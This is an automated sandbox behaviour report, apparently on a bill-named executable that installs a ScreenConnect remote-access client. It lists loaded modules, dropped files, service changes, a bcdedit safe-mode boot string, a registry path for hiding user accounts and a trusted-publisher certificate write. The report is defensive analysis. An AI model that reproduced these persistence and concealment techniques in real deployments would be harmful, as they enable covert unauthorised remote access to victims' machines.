Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: wintypes.dll

Source: C:\Users\user\Desktop\E_BILL0041272508.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32

Jump to behavior

Reads internet explorer settings

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

PE / OLE file has a valid certificate

Source: E_BILL0041272508.exe

Static PE information: certificate valid

PE file contains a mix of data directories often seen in goodware

Source: E_BILL0041272508.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: E_BILL0041272508.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: E_BILL0041272508.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: E_BILL0041272508.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: E_BILL0041272508.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: E_BILL0041272508.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: E_BILL0041272508.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

PE file contains a debug data directory

Source: E_BILL0041272508.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC367000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2385098018.00000000021E2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: E_BILL0041272508.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6E1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC363000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.2382809510.0000000002B12000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2435126842.0000000002241000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2435049004.00000000020E0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr, ScreenConnect.ClientService.dll0.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000006.00000000.2369506289.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.2378580945.000000000002D000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC35F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6DD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2387012518.000000001B472000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000006.00000000.2369506289.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC35F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6DD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2387012518.000000001B472000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC367000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2385098018.00000000021E2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6D5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC47C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.2383094950.0000000005022000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Core.dll0.2.dr, ScreenConnect.Core.dll.2.dr

PE file contains a valid data directory to section mapping

Source: E_BILL0041272508.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: E_BILL0041272508.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: E_BILL0041272508.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: E_BILL0041272508.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: E_BILL0041272508.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe

Unpacked PE file: 7.2.ScreenConnect.ClientService.exe.5020000.1.unpack

Binary contains a suspicious time stamp

Source: ScreenConnect.Client.dll.2.dr

Static PE information: 0xB8CD3C5A [Sat Mar 31 22:21:14 2068 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\E_BILL0041272508.exe

0_2_009B1000

PE file contains an invalid checksum

Source: E_BILL0041272508.exe

Static PE information: real checksum: 0x1bda6 should be: 0x23878

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\E_BILL0041272508.exe	Code function: 0_2_009B1BC0 push ecx; ret	0_2_009B1BD3
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD3467D2A5 pushad ; iretd	2_2_00007FFD3467D2A6
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD3479845E push eax; ret	2_2_00007FFD3479846D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD347A44B1 push esp; retf	2_2_00007FFD347A4619
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD347900BD pushad ; iretd	2_2_00007FFD347900C1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD3479842E pushad ; ret	2_2_00007FFD3479845D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD34797D00 push eax; retf	2_2_00007FFD34797D1D
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 6_2_00007FFD34783F3A pushad ; retf	6_2_00007FFD34783F3B
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 6_2_00007FFD3478401A push eax; iretd	6_2_00007FFD3478401B
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 6_2_00007FFD34782FDA pushad ; retf	6_2_00007FFD34782FDB
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 6_2_00007FFD347830BA push eax; iretd	6_2_00007FFD347830BB
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 6_2_00007FFD347801FD push ebp; retf	6_2_00007FFD347801EC
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 6_2_00007FFD34780188 push ebp; retf	6_2_00007FFD347801EC
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 6_2_00007FFD347801D8 push ebp; retf	6_2_00007FFD347801EC
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Code function: 8_2_05C09CF0 push esp; iretd	8_2_05C09CF1
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Code function: 8_2_05C08F70 push C304E3C5h; ret	8_2_05C08F80
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Code function: 8_2_05C0E9A2 push esp; ret	8_2_05C0E9B3
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Code function: 8_2_05C0E941 pushad ; ret	8_2_05C0E953
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34A8AC94 pushad ; iretd	9_2_00007FFD34A8ACB5
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34A8565B pushad ; retf	9_2_00007FFD34A85679
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34A815D0 push eax; iretd	9_2_00007FFD34A815D1
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34A85670 pushad ; retf	9_2_00007FFD34A85679
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34A858A7 push ss; iretd	9_2_00007FFD34A858B5
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34A81199 push esp; iretd	9_2_00007FFD34A8119A
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34A8127D push ebx; iretd	9_2_00007FFD34A8127E
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34A813ED push edx; iretd	9_2_00007FFD34A813EE
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34A81449 push ecx; iretd	9_2_00007FFD34A8144A
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34A81391 push edx; iretd	9_2_00007FFD34A81392

Persistence and Installation Behavior

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.ClientService.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsClient.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.Client.dll	Jump to dropped file

May use bcdedit to modify the Windows boot settings

Source: ScreenConnect.ClientService.dll.2.dr	Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
Source: ScreenConnect.ClientService.dll0.2.dr	Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}

Boot Survival

Creates or modifies windows services

Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application

Jump to behavior

Modifies existing windows services

Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (b044e727-8609-4a6c-b885-92d6249fd38a)

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Contains functionality to hide user accounts

Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.2387012518.000000001B472000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.ClientService.exe, 00000007.00000002.2382809510.0000000002B12000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2435126842.0000000002241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2435049004.00000000020E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.ClientService.dll.2.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.ClientService.dll0.2.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.Windows.dll0.2.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.Windows.dll.2.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

Stores large binary data to the registry

Source: C:\Users\user\Desktop\E_BILL0041272508.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
